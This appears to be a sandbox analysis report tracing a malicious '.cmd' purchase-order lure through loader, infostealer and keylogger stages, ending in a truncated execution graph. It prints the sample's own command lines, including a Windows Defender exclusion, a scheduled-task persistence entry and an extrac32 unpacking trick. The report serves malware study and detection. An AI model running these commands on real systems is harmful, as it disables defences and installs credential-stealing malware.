                                                                                                                            Target ID:0
                                                                                                                            Start time:05:46:52
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_KB#67897.cmd" "
                                                                                                                            Imagebase:0x7ff6c3940000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:1
                                                                                                                            Start time:05:46:52
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:05:46:52
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                            File size:35'328 bytes
                                                                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:05:46:53
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:1'367'040 bytes
                                                                                                                            MD5 hash:9B151296A899B0D58575CDE4E9563D18
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.2176575888.0000000002206000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.2259800821.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 18%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:05:46:58
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                            Imagebase:0x1c0000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:7
                                                                                                                            Start time:05:46:58
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:05:46:58
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:175'800 bytes
                                                                                                                            MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.2209421224.0000000001420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000001.2174375803.0000000001420000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2277062923.00000000280C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:9
                                                                                                                            Start time:05:47:01
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                            Imagebase:0x2f0000
                                                                                                                            File size:70'656 bytes
                                                                                                                            MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 79%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:10
                                                                                                                            Start time:05:47:01
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                                                                                                                            Imagebase:0x6e0000
                                                                                                                            File size:98'816 bytes
                                                                                                                            MD5 hash:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3379727606.0000000002A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3379727606.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 96%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            Target ID:11
                                                                                                                            Start time:05:47:03
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                            Imagebase:0xb40000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:12
                                                                                                                            Start time:05:47:03
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f
                                                                                                                            Imagebase:0xba0000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:13
                                                                                                                            Start time:05:47:03
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:14
                                                                                                                            Start time:05:47:03
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:16
                                                                                                                            Start time:05:47:09
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff717f30000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:17
                                                                                                                            Start time:05:47:11
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:1'367'040 bytes
                                                                                                                            MD5 hash:9B151296A899B0D58575CDE4E9563D18
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 18%, ReversingLabs
                                                                                                                            Has exited:true

                                                                                                                            Target ID:19
                                                                                                                            Start time:05:47:11
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                            Imagebase:0x1c0000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:20
                                                                                                                            Start time:05:47:11
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:21
                                                                                                                            Start time:05:47:12
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:175'800 bytes
                                                                                                                            MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000015.00000002.2463806238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2629075725.0000000036680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Has exited:true

                                                                                                                            Target ID:22
                                                                                                                            Start time:05:47:20
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:1'367'040 bytes
                                                                                                                            MD5 hash:9B151296A899B0D58575CDE4E9563D18
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Has exited:true

                                                                                                                            Target ID:24
                                                                                                                            Start time:05:47:21
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                            Imagebase:0xf20000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:25
                                                                                                                            Start time:05:47:21
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:26
                                                                                                                            Start time:05:47:21
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:175'800 bytes
                                                                                                                            MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000002.2555582256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2653675351.000000002FF20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000001.2405390189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Has exited:true

                                                                                                                            Target ID:28
                                                                                                                            Start time:05:47:30
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:1'367'040 bytes
                                                                                                                            MD5 hash:9B151296A899B0D58575CDE4E9563D18
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Has exited:true

                                                                                                                            Target ID:29
                                                                                                                            Start time:05:47:31
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                            Imagebase:0x440000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:30
                                                                                                                            Start time:05:47:31
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:31
                                                                                                                            Start time:05:47:31
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:175'800 bytes
                                                                                                                            MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000002.2704916181.00000000312B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001F.00000002.2653640305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001F.00000001.2498527749.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            Has exited:true

                                                                                                                            Target ID:32
                                                                                                                            Start time:05:48:01
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                            Imagebase:0x9e0000
                                                                                                                            File size:665'670'656 bytes
                                                                                                                            MD5 hash:8D01E7CA64DB66A5D357A071C6E39643
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            Has exited:false

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:15.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:10.3%
                                                                                                                              Total number of Nodes:290
                                                                                                                              Total number of Limit Nodes:15
                                                                                                                              execution_graph 25075 2b467bc 25892 2b2480c 25075->25892 25893 2b2481d 25892->25893 25894 2b24843 25893->25894 25895 2b2485a 25893->25895 25901 2b24b78 25894->25901 25910 2b24570 25895->25910 25898 2b2488b 25899 2b24850 25899->25898 25915 2b24500 25899->25915 25902 2b24b85 25901->25902 25909 2b24bb5 25901->25909 25903 2b24bae 25902->25903 25906 2b24b91 25902->25906 25907 2b24570 11 API calls 25903->25907 25905 2b24b9f 25905->25899 25921 2b22c44 11 API calls 25906->25921 25907->25909 25922 2b244ac 25909->25922 25911 2b24574 25910->25911 25912 2b24598 25910->25912 25935 2b22c10 25911->25935 25912->25899 25914 2b24581 25914->25899 25916 2b24504 25915->25916 25919 2b24514 25915->25919 25918 2b24570 11 API calls 25916->25918 25916->25919 25917 2b24542 25917->25898 25918->25919 25919->25917 25920 2b22c2c 11 API calls 25919->25920 25920->25917 25921->25905 25923 2b244b2 25922->25923 25924 2b244cd 25922->25924 25923->25924 25926 2b22c2c 25923->25926 25924->25905 25927 2b22c3a 25926->25927 25929 2b22c30 25926->25929 25927->25924 25928 2b22d19 25934 2b22ce8 7 API calls 25928->25934 25929->25927 25929->25928 25933 2b264cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25929->25933 25932 2b22d3a 25932->25924 25933->25928 25934->25932 25936 2b22c27 25935->25936 25938 2b22c14 25935->25938 25936->25914 25937 2b22c1e 25937->25914 25938->25937 25940 2b22d19 25938->25940 25943 2b264cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25938->25943 25944 2b22ce8 7 API calls 25940->25944 25942 2b22d3a 25942->25914 25943->25940 25944->25942 25945 2b4c2fc 25955 2b26518 25945->25955 25949 2b4c32a 25960 2b4bb48 timeSetEvent 25949->25960 25951 2b4c334 25952 2b4c342 GetMessageA 25951->25952 25953 2b4c336 TranslateMessage DispatchMessageA 25952->25953 25954 2b4c352 25952->25954 25953->25952 25956 2b26523 25955->25956 25961 2b24168 25956->25961 25959 2b2427c SysAllocStringLen SysFreeString SysReAllocStringLen 25959->25949 25960->25951 25962 2b241ae 25961->25962 25963 2b24227 25962->25963 25966 2b243b8 25962->25966 25975 2b24100 25963->25975 25967 2b243e9 25966->25967 25970 2b243fa 25966->25970 25980 2b2432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25967->25980 25969 2b243f3 25969->25970 25971 2b2443f FreeLibrary 25970->25971 25972 2b24463 25970->25972 25971->25970 25973 2b24472 